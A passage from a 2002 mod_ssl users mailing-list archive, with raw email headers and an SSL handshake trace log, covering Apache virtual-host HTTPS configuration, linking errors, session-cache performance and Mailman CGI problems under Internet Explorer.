SSLv3 write server hello A [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Loop: SSLv3 write finished A [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Loop: SSLv3 flush data [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Loop: SSLv3 read finished A [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Handshake: done [01/Jan/2002 23:59:47 04557] [info] Connection: Client IP: 24.78.66.137, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Write: SSL negotiation finished successfully [01/Jan/2002 23:59:47 04557] [info] Connection to child 1 closed with standard shutdown (server newton.stat.ubc.ca:443, client 24.78.66.137) [01/Jan/2002 23:59:48 04556] [info] Connection to child 0 established (server newton.stat.ubc.ca:443, client 24.78.66.137) [01/Jan/2002 23:59:48 04556] [info] Seeding PRNG with 1160 bytes of entropy [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Handshake: start [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Loop: before/accept initialization [01/Jan/2002 23:59:48 04556] [trace] Inter-Process Session Cache (DBM) Expiry: old: 1, new: 1, removed: 0 [01/Jan/2002 23:59:48 04556] [trace] Inter-Process Session Cache: request=GET status=FOUND id=C7E33B8644F80F0EA47BBBE5BE875306FB60A6BADA332FA42B602AF0CC31E0A6 (session reuse) [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Loop: SSLv3 read client hello A [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Loop: SSLv3 write server hello A [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Loop: SSLv3 write finished A [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Loop: SSLv3 flush data [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Loop: SSLv3 read finished A [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Handshake: done [01/Jan/2002 23:59:48 04556] [info] Connection: Client IP: 24.78.66.137, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [01/Jan/2002 23:59:48 04556] [trace] OpenSSL: Write: SSL negotiation finished successfully [01/Jan/2002 23:59:48 04556] [info] Connection to child 0 closed with standard shutdown (server newton.stat.ubc.ca:443, client 24.78.66.137) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 2 10:09:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA15616; Wed, 2 Jan 2002 10:08:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.ecomserver.com id KAA15572; Wed, 2 Jan 2002 10:07:10 +0100 (MET) Received: from INSPIRON3 ([65.202.44.138]) by mail.ecomserver.com (Netscape Messaging Server 4.15) with SMTP id GPB0IG00.748 for ; Wed, 2 Jan 2002 04:18:16 -0500 From: "Rajidhar Etta" To: Subject: RE: name-based vhost woes Date: Wed, 2 Jan 2002 04:09:17 -0500 Organization: eComServer Inc Message-ID: <000001c1936d$2894c000$ee03a8c0@INSPIRON3> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Rajidhar Etta" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I can think of two solutions (not sure if whether both of them turns out to be 'NOT ELIGENT' solutions) 1. Within the virtual host section of foo.com:443, you could do the following: SetEnvIfNoCase Host bar\.com bar SetEnvIfNoCase Host bar\.org bar (above sets two environment variable bar if the HTTP header Host field contains bar.com OR bar.org). Then in your section of DocumentRoot (say if it is /d1/d2 ) ... ... .. Allow from env!=bar Which actually blocks access to any page.... You can use the above in Also. 2. Use mod_rewrite (RewriteCond which checks the HOST & RewriteRule) inside the virtualhost to redirect to any error page. Rajidhar Etta eComServer, Inc 609.951.8500 (x 192) 609.203.3697 (Cell) -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Phil Hagen Sent: Tuesday, January 01, 2002 11:21 PM To: modssl-users@modssl.org Subject: name-based vhost woes -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greetings! With the help of the mailing list archives, I've gotten SSL transactions functional on one name-based vhost, and other non-SSL vhosts working as well. I understand that I can only have one port 443 server name running on the machine. However, is it possible to have apache generate an error message of some sort when trying to https:// to one of the non-SSL vhosts? For example consider the following configurations: - - foo.com:80 - - foo.com:443 - - bar.com:80 - - bar.org:80 - - etc. With an http://foo.com, all works as expected, an https://foo.com works properly, as do http://bar.com and http://bar.org. However, when entering https://bar.com or https://bar.org, I get a warning that the server is offering a certificate for a differently-named server. If I opt to accept it anyway under NS, I get the contents of https://foo.com, though the location bar shows https://bar.com. Is it possible to have an https request to the non-SSL vhosts get killed without rolling over to the one SSL config? Thanks for the great support lists, and excellent code! - -Phil Hagen - -- http://identityvector.com/~phil/ (PGP Key, software, etc) PGP key also at http://www.keyserver.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjwyiqAACgkQ/5g75OFK7JNJuQCdHsGvuP3T4Wywsr8S8McFVDGS vBwAn1YXl2XHsDYV5l45MWMDkAHRCb2s =Qhmt -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 2 21:45:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA10527; Wed, 2 Jan 2002 21:44:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1-gui.server.ntli.net id VAA10510; Wed, 2 Jan 2002 21:43:10 +0100 (MET) Received: from simonp90pc ([213.107.76.160]) by mail1-gui.server.ntli.net (Post.Office MTA v3.1 release PO203a ID# 0-33929U70000L2S50) with SMTP id AAA23661 for ; Wed, 2 Jan 2002 20:43:08 +0000 From: "Simon Ritchie" To: Subject: RE: undefined symbol: _OtsRemainder32Unsigned Date: Wed, 2 Jan 2002 20:43:59 -0000 Message-ID: <000b01c193ce$345ada80$0200a8c0@home> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 In-Reply-To: <20020102003259.29743.qmail@web20206.mail.yahoo.com> Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Simon Ritchie" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Yes, I have libssl.so in there. Additionally, i > typed: > strings libssl.so | grep OtsRemainder Is strings the right tool for this job on your system? I don't know enough about the format of object code to be certain, but according to me, that could just as easily be a call to the function as the function itself. In other words, libssl.so contains a call to the function, but it's actually defined in another library. It would be better to use an object code analysis tool. On my red hat linux system, it's called nm. If you compile your code with the -g option, you may get a bit more information in the error message about where the symbol is being called from. Simon ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 4 14:01:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA28729; Fri, 4 Jan 2002 14:00:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1-gui.server.ntli.net id NAA28651; Fri, 4 Jan 2002 13:59:41 +0100 (MET) Received: from simonp90pc ([213.107.76.160]) by mail1-gui.server.ntli.net (Post.Office MTA v3.1 release PO203a ID# 0-33929U70000L2S50) with SMTP id AAA18045 for ; Fri, 4 Jan 2002 12:59:40 +0000 From: "Simon Ritchie" To: Subject: RE: problem while giving url HTTPS Date: Fri, 4 Jan 2002 13:00:29 -0000 Message-ID: <000f01c1951f$c9875960$0200a8c0@home> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <20011217082046.23243.qmail@web9904.mail.yahoo.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Simon Ritchie" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > i have > configured apache v 1.3.22 with mod+ssl and my lynx > browser is 2.8.4 i am able to test through > http://localhost but when i give https://localhost so > it giving me "This client does not contain support for > https urls" I think that this is a problem with Lynx. Lynx is your client, Apache is your server. Try it with explorer or netscape. If I'm right, then the issue is outside the scope of this list. Simon ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 4 15:53:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA04639; Fri, 4 Jan 2002 15:52:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from baker.cnw.com id PAA04616; Fri, 4 Jan 2002 15:51:29 +0100 (MET) Received: from hermes.thewebsons.com (dhcp-0-173.dsl.cnw.net [216.9.0.173]) by baker.cnw.com (8.9.3/8.9.3) with ESMTP id GAA26710 for ; Fri, 4 Jan 2002 06:51:24 -0800 (PST) Message-Id: <5.1.0.14.0.20020104064728.00a468d0@mail.thewebsons.com> X-Sender: linux@thewebsons.com@mail.thewebsons.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 04 Jan 2002 06:51:48 -0800 To: modssl-users@modssl.org From: Ben Ocean Subject: Installation Problem Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ben Ocean X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi; I built openssl, apache & modssl as per the instructions in the latter. When I type in the command ./apachectl startssl all comes up fine so long as I've commented out certain things (see below) in httpd.conf. But https://blah.com doesn't resolve. ./apachectl startssl chokes on the following lines: SSLEngine on SSLCertificateFile /over/here SSLCertificateKeyFile /over/there SSLCACertificatePath /over/yonder SSLRequireCipher this-here-key and, of course SSLEnable What have I done wrong? TIA, BenO ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 5 00:07:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA00271; Sat, 5 Jan 2002 00:06:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from aples1.jhuapl.edu id AAA00122; Sat, 5 Jan 2002 00:06:13 +0100 (MET) Received: by aples1.jhuapl.edu with Internet Mail Service (5.5.2653.19) id ; Fri, 4 Jan 2002 18:06:08 -0500 Message-ID: From: "Yu, Ming" To: "'modssl-users@modssl.org'" Subject: apache + modssl + openssl + Windows Client. Date: Fri, 4 Jan 2002 18:05:19 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Yu, Ming" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have a box with Solaris 2.8, apache 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b. I found it is very slow for windows NT or 2000 client using either IE or Netscape. It has very nice speed if it is a Unix or Linux client. Does anyone know why? Thanks in advance for any answers. - Ming Yu - APL ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 5 00:09:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA00753; Sat, 5 Jan 2002 00:08:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from aples1.jhuapl.edu id AAA00722; Sat, 5 Jan 2002 00:07:24 +0100 (MET) Received: by aples1.jhuapl.edu with Internet Mail Service (5.5.2653.19) id ; Fri, 4 Jan 2002 18:07:18 -0500 Message-ID: From: "Yu, Ming" To: "'modssl-users@modssl.org'" Date: Fri, 4 Jan 2002 18:06:25 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Yu, Ming" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Ming Yu > =================================== > Enterprise Communications Group - BIX > JHU Applied Physics Laboratory > Telephone: 443 778-7117 Fax: 443 778-5727 > Email: ming.yu@jhuapl.edu =================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 5 00:30:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA01539; Sat, 5 Jan 2002 00:29:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id AAA01506; Sat, 5 Jan 2002 00:28:33 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g04NRCi04092 for ; Fri, 4 Jan 2002 18:27:12 -0500 Date: Fri, 4 Jan 2002 18:27:12 -0500 (EST) From: Cliff Woolley X-X-Sender: To: "'modssl-users@modssl.org'" Subject: Re: apache + modssl + openssl + Windows Client. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, 4 Jan 2002, Yu, Ming wrote: > I have a box with Solaris 2.8, apache 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b. > I found it is very slow for windows NT or 2000 client using either IE or > Netscape. It has very nice speed if it is a Unix or Linux client. Does > anyone know why? > > Thanks in advance for any answers. What kind of session cache are you using? --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 5 00:35:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA01756; Sat, 5 Jan 2002 00:34:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from aples1.jhuapl.edu id AAA01743; Sat, 5 Jan 2002 00:33:45 +0100 (MET) Received: by aples1.jhuapl.edu with Internet Mail Service (5.5.2653.19) id ; Fri, 4 Jan 2002 18:33:39 -0500 Message-ID: From: "Yu, Ming" To: "'modssl-users@modssl.org'" Subject: RE: apache + modssl + openssl + Windows Client. Date: Fri, 4 Jan 2002 18:32:50 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Yu, Ming" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I use dbm as session cache. - Ming -----Original Message----- From: Cliff Woolley [mailto:jwoolley@wlu.edu] Sent: Friday, January 04, 2002 6:27 PM To: 'modssl-users@modssl.org' Subject: Re: apache + modssl + openssl + Windows Client. On Fri, 4 Jan 2002, Yu, Ming wrote: > I have a box with Solaris 2.8, apache 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b. > I found it is very slow for windows NT or 2000 client using either IE or > Netscape. It has very nice speed if it is a Unix or Linux client. Does > anyone know why? > > Thanks in advance for any answers. What kind of session cache are you using? --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 5 02:37:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA07240; Sat, 5 Jan 2002 02:36:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id CAA07207; Sat, 5 Jan 2002 02:35:15 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g051XsE04851 for ; Fri, 4 Jan 2002 20:33:54 -0500 Date: Fri, 4 Jan 2002 20:33:54 -0500 (EST) From: Cliff Woolley X-X-Sender: To: "'modssl-users@modssl.org'" Subject: RE: apache + modssl + openssl + Windows Client. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, 4 Jan 2002, Yu, Ming wrote: > I use dbm as session cache. Try an shm session cache and see what happens. --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 5 18:11:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA15842; Sat, 5 Jan 2002 18:10:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from imsm030.netvigator.com id SAA15825; Sat, 5 Jan 2002 18:10:00 +0100 (MET) Received: (qmail 17044 invoked from network); 5 Jan 2002 17:09:57 -0000 Received: from pcd255127.netvigator.com (HELO williamdesktop) (203.218.45.127) by imsm030.netvigator.com with SMTP; 5 Jan 2002 17:09:57 -0000 Message-ID: <002401c1960b$f8a11f00$7080a8c0@williamdesktop> From: "William WK Lee" To: References: Subject: Re: apache + modssl + openssl + Windows Client. Date: Sun, 6 Jan 2002 01:11:10 +0800 Organization: Williamlee.Org MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "William WK Lee" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Could you please DON'T send a single question out for multiple time, please?! It is VERY annoying to receive multiple copies of the same message. William WK Lee A Microsoft Certified Professional Hong Kong -- William's Home Online (WHO) - www.williamlee.org A new look and feel! ----- Original Message ----- From: "Yu, Ming" To: Sent: Saturday, January 05, 2002 7:05 AM Subject: apache + modssl + openssl + Windows Client. > I have a box with Solaris 2.8, apache 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b. > I found it is very slow for windows NT or 2000 client using either IE or > Netscape. It has very nice speed if it is a Unix or Linux client. Does > anyone know why? > > Thanks in advance for any answers. > > - Ming Yu > - APL > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 6 20:13:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA20656; Sun, 6 Jan 2002 20:12:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from linux.midrange.com id UAA20628; Sun, 6 Jan 2002 20:11:35 +0100 (MET) Received: from dustpuppy.midrange.com (dustpuppy.midrange.com [192.168.1.10]) by linux.midrange.com (8.11.6/linuxconf) with ESMTP id g06JBXm11753 for ; Sun, 6 Jan 2002 13:11:33 -0600 Message-Id: <5.1.0.14.2.20020106130355.02bcbd90@linux.midrange.com> X-Sender: david@linux.midrange.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sun, 06 Jan 2002 13:11:15 -0600 To: modssl-users@modssl.org From: David Gibbs Subject: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Gibbs X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Folks: I'm having a problem getting mod_ssl to work in my Apache server running Mailman CGI programs. I'm running RedHat 7.2, with Apache/1.3.22 & mod_ssl 2.8.4. I have self-signed the certificates and the system seems to work fine when using Netscape. For some reason, however, when I try to access the exact same pages with Internet Explorer (5.5), none of the cgi input is accepted ... it's just ignored. The mailman interface uses POST to submit the data to the server. I'm using the following SSL dirctives... SSLEngine on SSLCertificateFile /etc/httpd/conf/ssl.crt/lists.crt SSLCertificateKeyFile /etc/httpd/conf/ssl.key/lists.key CustomLog /var/log/httpd/mailman/ssl_request_log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" ScriptAlias /cgi-bin/ /home/mailman/cgi-bin/ SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire Any suggestions? Thanks! david ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 6 22:11:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA25790; Sun, 6 Jan 2002 22:10:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id WAA25707; Sun, 6 Jan 2002 22:09:50 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA08702 for ; Sun, 6 Jan 2002 16:19:19 -0500 Date: Sun, 6 Jan 2002 16:19:19 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman In-Reply-To: <5.1.0.14.2.20020106130355.02bcbd90@linux.midrange.com> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'd remove the mailman CGI scripts, they have some security issues that have been covered on the Bugtraq list. Thanks, Ron DuFresne On Sun, 6 Jan 2002, David Gibbs wrote: > Folks: > > I'm having a problem getting mod_ssl to work in my Apache server running > Mailman CGI programs. > > I'm running RedHat 7.2, with Apache/1.3.22 & mod_ssl 2.8.4. > > I have self-signed the certificates and the system seems to work fine when > using Netscape. > > For some reason, however, when I try to access the exact same pages with > Internet Explorer (5.5), none of the cgi input is accepted ... it's just > ignored. > > The mailman interface uses POST to submit the data to the server. > > I'm using the following SSL dirctives... > > SSLEngine on > SSLCertificateFile /etc/httpd/conf/ssl.crt/lists.crt > SSLCertificateKeyFile /etc/httpd/conf/ssl.key/lists.key > CustomLog /var/log/httpd/mailman/ssl_request_log "%t %h > %{SSL_PROTOCOL}x > %{SSL_CIPHER}x \"%r\" %b" > ScriptAlias /cgi-bin/ /home/mailman/cgi-bin/ > SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars > +StrictRequire > > Any suggestions? > > Thanks! > > david > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 6 23:40:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA29465; Sun, 6 Jan 2002 23:39:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id XAA29428; Sun, 6 Jan 2002 23:38:29 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id 0D3CE7DE4; Sun, 6 Jan 2002 17:38:41 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id 0A80A3EA4 for ; Sun, 6 Jan 2002 17:38:41 -0500 (EST) Date: Sun, 6 Jan 2002 17:38:41 -0500 (EST) From: "Julian C. Dunn" To: Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman In-Reply-To: Message-ID: <20020106173419.N69158-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 6 Jan 2002, R. DuFresne wrote: > I'd remove the mailman CGI scripts, they have some security issues that > have been covered on the Bugtraq list. I really don't think that this is a very helpful comment because it's a non-sequitur; first off it doesn't solve David's problem, and second of all, you should provide some context for that statement. MailMan < 2.0.8 suffers from cross-site-scripting security problems which have been fixed in the latest release, if those are the security issues you are referring to. Even so, what if David is running MailMan on an intranet where the CSS bugs won't be exploited? Then these security issues are not relevant to him. - Julian > On Sun, 6 Jan 2002, David Gibbs wrote: > > > Folks: > > > > I'm having a problem getting mod_ssl to work in my Apache server running > > Mailman CGI programs. > > > > I'm running RedHat 7.2, with Apache/1.3.22 & mod_ssl 2.8.4. > > > > I have self-signed the certificates and the system seems to work fine when > > using Netscape. > > > > For some reason, however, when I try to access the exact same pages with > > Internet Explorer (5.5), none of the cgi input is accepted ... it's just > > ignored. > > > > The mailman interface uses POST to submit the data to the server. > > > > I'm using the following SSL dirctives... > > > > SSLEngine on > > SSLCertificateFile /etc/httpd/conf/ssl.crt/lists.crt > > SSLCertificateKeyFile /etc/httpd/conf/ssl.key/lists.key > > CustomLog /var/log/httpd/mailman/ssl_request_log "%t %h > > %{SSL_PROTOCOL}x > > %{SSL_CIPHER}x \"%r\" %b" > > ScriptAlias /cgi-bin/ /home/mailman/cgi-bin/ > > SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars > > +StrictRequire > > > > Any suggestions? > > > > Thanks! > > > > david > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > -- > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > admin & senior consultant: sysinfo.com > http://sysinfo.com > > "Cutting the space budget really restores my faith in humanity. It > eliminates dreams, goals, and ideals and lets us get straight to the > business of hate, debauchery, and self-annihilation." > -- Johnny Hart > > testing, only testing, and damn good at it too! > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 03:03:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA09019; Mon, 7 Jan 2002 03:02:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from frustration.identityvector.net id DAA08984; Mon, 7 Jan 2002 03:01:25 +0100 (MET) Received: from localhost (freak@localhost) by frustration.identityvector.net (8.11.2/8.11.2) with ESMTP id g0721Ep09671 for ; Sun, 6 Jan 2002 21:01:17 -0500 X-Authentication-Warning: 